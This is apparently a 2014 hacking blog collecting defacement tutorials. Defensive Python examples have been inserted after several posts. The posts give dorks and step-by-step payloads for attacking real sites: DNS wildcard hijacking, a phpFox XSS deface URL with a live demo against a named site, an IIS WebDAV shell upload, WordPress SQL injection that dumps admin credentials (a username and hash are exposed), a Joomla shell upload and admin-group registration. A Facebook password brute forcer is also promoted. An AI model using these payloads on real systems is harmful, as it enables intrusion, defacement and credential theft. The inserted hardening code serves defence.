Monday, 10 March 2014

DNS Hijacking with 000Webhost







Finding Target

1- Sign up for an account at www.000webhost.com

2- Create a new site; just use the subdomain. For example, mine was: http://testingfu.comule.com






Exploiting Target

1- Now go to cPanel and look for the IP address; you'll get something like "31.170.163.140".

2- Now go to Bing.com and type the dork ip:31.170.163.140. If you want .gov, .edu or any other particular domain, then the dork should be " ip:31.170.163.140 .gov " or " ip:31.170.163.140 .edu ".

Server 1 with 253 ips
31.170.161.1 - 31.170.161.253

Server 2 with 253 ips
31.170.162.1 - 31.170.162.253

Server 3 with 242 ips
31.170.163.1 - 31.170.163.241


3- Let's say our result/target is york.gov.il. Simply add abcd or anything you like in front of the URL, so it looks like this:

abcd.york.gov.il

and you will get this error page





4- Now go to your Cpanel at 000webhost and park a subdomain 





 5- Now go to public_html and upload your deface page. :D


SOURCE: DEVILCAFE
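
The steps above only work when the target's DNS answers for unclaimed names (typically a wildcard record) with an address on shared hosting, where any customer can then park that name. The following audit is an added example, not part of the original post: it flags such records in a zone export. The address ranges are the ones quoted above; the zone data, the `example.test` domain and the function names are constructed for illustration.

```python
import ipaddress

# Shared-hosting ranges quoted in the post (first and last address of each).
SHARED_RANGES = [
    ("31.170.161.1", "31.170.161.253"),
    ("31.170.162.1", "31.170.162.253"),
    ("31.170.163.1", "31.170.163.241"),
]

def in_shared_range(ip):
    """True when ip falls inside one of the shared-hosting ranges."""
    addr = ipaddress.ip_address(ip)
    return any(
        ipaddress.ip_address(lo) <= addr <= ipaddress.ip_address(hi)
        for lo, hi in SHARED_RANGES
    )

def audit_zone(records, provisioned):
    """records: (owner name, A-record address) pairs exported from your zone.
    provisioned: hostnames you have actually attached to your hosting account.
    Returns a list of (name, ip, reason) findings."""
    findings = []
    for name, ip in records:
        if not in_shared_range(ip):
            continue
        if name.startswith("*."):
            findings.append((name, ip, "wildcard sends every unclaimed label to shared hosting"))
        elif name not in provisioned:
            findings.append((name, ip, "points at shared hosting but no site is attached"))
    return findings

# Constructed sample zone; example.test is a placeholder domain.
SAMPLE_ZONE = [
    ("example.test", "31.170.163.140"),
    ("www.example.test", "31.170.163.140"),
    ("*.example.test", "31.170.163.140"),
    ("old-campaign.example.test", "31.170.162.17"),
    ("mail.example.test", "192.0.2.25"),
]
SAMPLE_PROVISIONED = {"example.test", "www.example.test"}

if __name__ == "__main__":
    for name, ip, reason in audit_zone(SAMPLE_ZONE, SAMPLE_PROVISIONED):
        print(f"{name} -> {ip}: {reason}")
```

Every finding is fixed the same way: delete the record, or replace the wildcard with explicit records for hosts that are really provisioned.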

phpFox XSS Vulnerability








Finding Vulnerable Target

Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
            "inurl:/static/ajax.php?core"


1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- So, your site would be like this or something similar,

www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc  


2- Now, replace the error message with your HTML tags or anything you want.

To show a header
<h1>Hacked</h1>

To show a header in the center

<center><h1>Hacked</h1></center>

To show a title

<title>Hacked</title>

To add an image
<img src="http://www.black-cybersec-crew.blogspot.com'><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/>

To add a message
<p><b>Your Message Here</b></p>

To write a message on multiple lines
<p><b>First line<br>Second Line </b></p>

To add scrolling text
<marquee>Scrolling text Here</marquee>

To add an alert box

<script>alert("hello");</script>

To add a background colour to the page

<body bgcolor="red"/>

To add a full deface page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.black-cybersec-crew.blogspot.com'><marquee><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/></marquee>


3- So it would be like this,

http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E


Live Demo:

http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
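
The URLs above work because the `message` parameter is written into the response as markup. The following is an added example, not phpFox code and not part of the original post: a simplified stand-in for the `core.message` handler that renders the same request with and without output encoding. The host `site.test`, the function names and the header set are assumptions made for the illustration.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed request in the shape shown in the post; site.test is a placeholder host.
SAMPLE_URL = ("http://www.site.test/static/ajax.php?core[ajax]=true"
              "&core[call]=core.message&height=150&width=300"
              "&message=%3Cscript%3Ealert(%22hello%22)%3B%3C/script%3E")

def _message(url):
    """Extract the decoded message parameter from the request URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("message", [""])[0]

def render_vulnerable(url):
    """Stand-in for the behaviour the post relies on: the value is echoed as markup."""
    return '<div class="message">' + _message(url) + "</div>"

def render_hardened(url):
    """Treat the parameter as text: cap its length and HTML-encode it on output."""
    text = _message(url)[:300]
    return '<div class="message">' + html.escape(text, quote=True) + "</div>"

# Response headers that limit the damage if an encoding step is ever missed.
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_URL))
    print(render_hardened(SAMPLE_URL))
```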

IIS Exploit







Finding Vulnerable Target

Dork:  inurl:"~r00t.txt"
             intext:"Powered by IIS"

MORE DORKS

1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- Go to Start>Run


2- Copy and paste this code in the text box

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}




3- Click OK

4- Now a window will open. Choose File > New > Web Folder




5- Type the website's address you want to deface in the text box, click Next, then Finish

  
6- Now go to the Web Folder you created in My Computer > My Network Places. Open the folder and paste your Shell.asp or deface page.

7- Now, to access your shell or to see your deface page, just open your browser and type the site name and your shell name or deface page name, like this:

Shell

http://www.site.com/shell.asp;.jpg
 
Deface Page 

 http://www.site.com/deface-page.html  


 

Exploit Wordpress : fbconnect SQL Injection Vulnerability







Hey guys, today I'm going to share with you an exploit in WordPress that enables you to get the admin's username and password (encrypted).

Finding Vulnerable Target

Dork: inurl:"fbconnect_action=myhome" 

Exploit: 

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,
7,8,9,10,11,12+from+wp_users--

1- Copy the dork and paste it on Google

2- Choose any site and you will see something like this or similar,





Exploiting Target

1- Let's say your target URL is like this,

http://www.site.com/?fbconnect_action=myhome&userid=3

Paste the exploit behind the URL, so it will be like this

http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--

2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)




user:password

So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.

3- After you have successfully decrypted the password, you can log in to the website at

www.site.com/wp-login.php

or

www.site.com/wp-admin  
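
The request above succeeds only if `fbuserid` is concatenated into a SQL statement. The following is an added example, not the plugin's code and not part of the original post: it shows what concatenation does to the statement and a lookup that validates and binds the value instead. The query text, the table layout and the sample row are assumptions; SQLite stands in for the site's database.

```python
import sqlite3

# The parameter value from the post, URL-decoded ('+' is a space in a query string).
PAGE_PAYLOAD = ("1 and 1=2 union select 1,2,3,4,5,"
                "concat(user_login,0x3a,user_pass)z0mbyak,"
                "7,8,9,10,11,12 from wp_users--")

def build_query_vulnerable(fbuserid):
    """Concatenation: whatever arrives in fbuserid becomes part of the SQL grammar."""
    return "SELECT * FROM wp_users WHERE ID = " + fbuserid

def lookup_hardened(db, fbuserid):
    """Accept only a short decimal id, bind it as data, and never select user_pass."""
    if not (fbuserid.isascii() and fbuserid.isdigit() and len(fbuserid) <= 10):
        return None
    row = db.execute(
        "SELECT ID, display_name FROM wp_users WHERE ID = ?", (int(fbuserid),)
    ).fetchone()
    return row

def make_db():
    """Constructed in-memory table; the row and its hash value are placeholders."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,"
               " user_pass TEXT, display_name TEXT)")
    db.execute("INSERT INTO wp_users VALUES (3, 'editor', 'PLACEHOLDER-HASH', 'Site Editor')")
    return db

if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable(PAGE_PAYLOAD))   # the UNION is now part of the statement
    print(lookup_hardened(db, PAGE_PAYLOAD))      # rejected before any SQL runs
    print(lookup_hardened(db, "3"))               # a normal id still works
```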

Saturday, 8 March 2014

Malaysian Site Hacked During Ops #Gila #Hempas As A Warning To The Government of Malaysia




Once again, Malaysian websites were attacked by hackers from their own country. Examined in detail, this time the attacks are similar to the attack made by "Sofea Hana" during the last elections.

In the past, "Sofea Hana" listed several demands in defense of the rights of the people; this time, Ops #Gila #Hempas also features some of the claims. The defacement listed them on the hacked websites:


  1. Oppose the PBS implementation that burdens teachers and students. They are not experiments, whatever reason is given.
  2. Abolish GST burden subtly.
  3. Against the Trans-Pacific Partnership Agreement (TPPA).
  4. Kelantan willingly wants to impose hudud. Let them implement hudud in advance while other states observe their development.
  5. People are increasingly pinched as the cost of living is rising. Please execute Free Education.
  6. Multiply the number of affordable homes for the people.
  7. Please MACC perform tasks more transparent and unbiased.
  8. MACC urges probe leakages of public funds.
  9. Eliminate leeches Road (Suit AES).
  10. Please preserve the dignity of religious leaders is not just in the mouth alone, but through action.
  11. Please execute the administration of religious mold in total, not per the British.
  12. What's great about Taib Mahmud up her immune from MACC? Please MACC bold and transparent in matters such as this!
  13. Lower the price of the vehicle. We can not afford to wait until PRU14.
  14. Do not hide things about people, such as the rise in Senyap2 RON97 without the knowledge of the people.
  15. Why is there a high profile case closed while there are still no solution? Please transparency in the investigation, we the people do not forget.

  List of the hacked websites that have been submitted to Zone-H



Based on what we have been informed, Ops #Gila #Hempas was this time joined by many local hacker groups including RED BEAN ARMY.

SOURCE: TETIKUS.NET 

Twitter.com Hacked Via Text Load Injection by ./BL4CK E4GL3



I found this around 2 AM last night, and it's quite surprising that twitter.com is vulnerable to Text Load Injection. Text load injection is where you are allowed to inject text from ixData that is an indextable data type. So it will display a message as follows,


{"request":"\/i\/promoted_content\/log.json?BL4CK_E4GL3_W4S_H3RE",
"error":"Invalid event parameter provided."}
 
We will get that message by visiting the following link:
 https://twitter.com/i/promoted_content/log.json?BL4CK_E4GL3_W4S_H3RE  
 
I tried to submit it on a defacement mirror like Zone-H, but I can't because someone already submitted Twitter.com to that mirror, and it was a FAKE defacement. WTF?
 
 
 

Friday, 7 March 2014

Facebook Password Cracker v1 [Released!]







Hello everyone! This is the time that you guys have been waiting for, the release of Facebook Password Cracker!

Features:

-Audio (supported in some OS with Mplayer)
-Coloured Text (supported in some OS/Python version)
-Anti-Proxy


This is just a brute forcer, so it won't confirm any success. It depends on your target. I advise you to make your own password list based on your target, so it would be more accurate.

YOU MUST INSTALL PYTHON TO RUN THIS PROGRAMME

Audio

There is a voice saying "Welcome!" once you start it. It is supported in some OS with Mplayer. If you do not have Mplayer, you will get an error message like this,

"player: could not connect to socket
mplayer: No such file or directory
;31m" 


But don't worry, the programme will still run :D


Coloured Text

I put some colour in the text, so it won't look boring. This might not be supported by all OS/Python versions, but the programme will still run :D


Anti-Proxy

If you are trying to hack a Facebook account from another country, you don't need to use a proxy at all. I tested with an Israeli Facebook account, and it was successfully cracked without any problem.


Important Note

The disadvantage of this programme is that if you are on a STRONG internet connection, you cannot use a large password list. The maximum number of passwords in one wordlist is only 6. This is because, if you are brute forcing on a STRONG internet connection, your attack will be blocked by the Facebook firewall.

But if you are on a WEAK internet connection, you're free to use as many passwords in a wordlist as you like. There will be no interruption by the Facebook firewall.






Enjoy! WE WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAMME.

Please tell us anything you want us to add/fix about this programme :) 

Exploit Joomla! : com_jinc






POC:

Dork: inurl:option=com_jinc

Exploit: 

/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=shell.php 

Shell Uploaded to:

 /administrator/components/com_jinc/classes/graphics/tmp-upload-images/shell.php


This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15
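
The IIS post above ends with a file named `shell.asp;.jpg`, and this post passes `name=shell.php` to an upload script. Both depend on the server storing an upload under a client-chosen name in a directory where scripts execute. The following upload check is an added example, not code from Joomla, com_jinc or IIS and not part of the original posts; the allowed types, the naming rule and the sample bodies are assumptions.

```python
import os
import re
import secrets

# Allowed extensions and the leading bytes a real file of that type starts with.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
# One base name, one dot, one extension: no ';', no second dot, no path separators.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")

def accept_upload(client_name, body):
    """Return a server-chosen storage name, or None when the upload is refused."""
    if not SAFE_NAME.fullmatch(client_name):
        return None
    ext = os.path.splitext(client_name)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not body.startswith(magic):
        return None
    # The client-supplied name is never used on disk.
    return secrets.token_hex(16) + ext

# Constructed samples: names taken from the posts, bodies made up for the demo.
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SCRIPT = b"<?php /* placeholder */ ?>"
SAMPLES = [
    ("shell.php", SCRIPT),
    ("shell.asp;.jpg", JPEG),
    ("deface-page.html", b"<html></html>"),
    ("photo.jpg", SCRIPT),
    ("photo.jpg", JPEG),
]

def verdicts():
    """Accept/refuse decision for each constructed sample, in order."""
    return [(name, accept_upload(name, body) is not None) for name, body in SAMPLES]

if __name__ == "__main__":
    for name, ok in verdicts():
        print(f"{name!r}: {'stored' if ok else 'refused'}")
```

The check belongs behind authentication, and the storage directory should be outside the web root or configured so that nothing in it is executed as a script.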

How to Upload Shell in Joomla! Site [Video]






Exploit Joomla! : Com_user [Manual]



Hello everyone! It has been a while since I last updated this blog, as I was very busy. So today I want to post about an exploit in the Joomla! CMS, where the vulnerability is that we can register a new user on the site.

Finding Vulnerable target:

Dorks:

inurl:index.php/using/joomla site:com
   
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

MORE DORKS

Exploit:

index.php?option=com_users&view=registration


1- Copy any of the dorks and paste it on Google
2- Choose any site and check administrator page by adding /administrator/ at the end of the site URL.

Example:

 www.site.com/index.php/using-joomla/extensions/components/content-component/article-category-list/50-terapia

to

www.site.com/administrator/

So you will see the admin login area. If the admin login area is like the picture below, it might be vulnerable,

  
Vulnerable

 Not Vulnerable

*Note: Ignore the language of the admin login panel.

Exploiting Target

1- Paste the exploit behind the site URL, so you will get the registration form.

2- Fill in the form; in the password fields, put two different passwords. For example,

Password: abcdefg
Confirm Password: abcxyz123

3- In the Confirm Email Column, click inspect element and paste this code below it,

<dd><input value="7" name="jform[groups][]"/></dd>

4- Click register, and it will say "Password not match.." or something similar; simply fill in the form correctly and click register.

5- The confirmation email will be sent to your email address; check your inbox and click on the link given to activate your account.

6- Go to the administrator login area and log in with your username and password.


Can't understand? Watch this video, and leave a comment :D



Also see: How to Upload Shell In Joomla! Site [Video]
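
The steps above rely on two server-side mistakes: the registration handler accepts a client-supplied `groups` field, and the data kept after a failed submission is merged into the next one. The following model is an added example, not Joomla code and not part of the original post: it replays that two-step submission against a naive handler and against one that allowlists fields and assigns the group itself. The field names, the class and the default group id 2 are assumptions.

```python
ALLOWED_FIELDS = ("name", "username", "password1", "password2", "email1", "email2")
DEFAULT_GROUPS = [2]  # assumption: id of the ordinary registered-user group

def filter_form(posted):
    """Keep only the fields a public registration form is allowed to set."""
    return {k: posted[k] for k in ALLOWED_FIELDS if k in posted}

class RegistrationFlow:
    def __init__(self, hardened):
        self.hardened = hardened
        self.session = {}  # form data kept after a failed validation, to refill the form

    def submit(self, posted):
        data = filter_form(posted) if self.hardened else dict(posted)
        merged = {**self.session, **data}
        if merged.get("password1") != merged.get("password2"):
            self.session = merged  # remembered for the retry
            return None
        self.session = {}
        # Hardened: group membership is decided by the server, never by the request.
        groups = DEFAULT_GROUPS if self.hardened else merged.get("groups", DEFAULT_GROUPS)
        return {"username": merged["username"], "groups": list(groups)}

# Constructed submissions matching the steps above (mismatched passwords, extra field).
FIRST = {"name": "New User", "username": "newuser", "password1": "abcdefg",
         "password2": "abcxyz123", "email1": "u@example.test",
         "email2": "u@example.test", "groups": [7]}
SECOND = {"name": "New User", "username": "newuser", "password1": "abcdefg",
          "password2": "abcdefg", "email1": "u@example.test",
          "email2": "u@example.test"}

def replay(hardened):
    """Run the failed submission followed by the valid one; return the created account."""
    flow = RegistrationFlow(hardened)
    assert flow.submit(FIRST) is None
    return flow.submit(SECOND)

if __name__ == "__main__":
    print("naive:   ", replay(False))
    print("hardened:", replay(True))
```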